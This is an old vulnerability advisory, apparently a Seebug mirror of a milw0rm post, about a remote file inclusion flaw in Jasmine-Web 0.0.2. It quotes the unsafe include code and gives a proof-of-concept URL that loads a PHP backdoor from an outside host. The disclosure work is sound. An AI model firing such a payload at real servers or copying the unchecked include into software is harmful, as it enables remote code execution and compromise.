JASmine <= 0.0.2 (index.php) Remote File Include Vulnerability

2006-10-10T00:00:00
ID SSV:16625
Type seebug
Reporter Root
Modified 2006-10-10T00:00:00

Description

No description provided by source.

                                        
                                            
                                                #
# Title..: 7 php scripts File Inclusion Vuln / Source disclosure
# Credits: DarkFig
# Og.link: http://acid-root.new.fr/poc/13061007.txt
#
# Using http://www.google.com/codesearch
# Few examples about what we can do with a code search engine
# For educational purpose only.
#
# You can use regex in your research, this can be chaotic.
# What's your opinion about the google code search project ?
#

# Affected.scr: Jasmine-Web
# Download....: http://www.sourcefiles.org/Utilities/Printer/Jasmine-Web-0.0.2.tar.bz2
# Poc.........: http://victim.pl/index.php?section=ftp://hack.com/backdrphpext
# Vuln.code...: if (isset($_GET['section']) && file_exists($_GET['section'].".php")){
#               include_once($_GET['section'].".php");

# milw0rm.com [2006-10-10]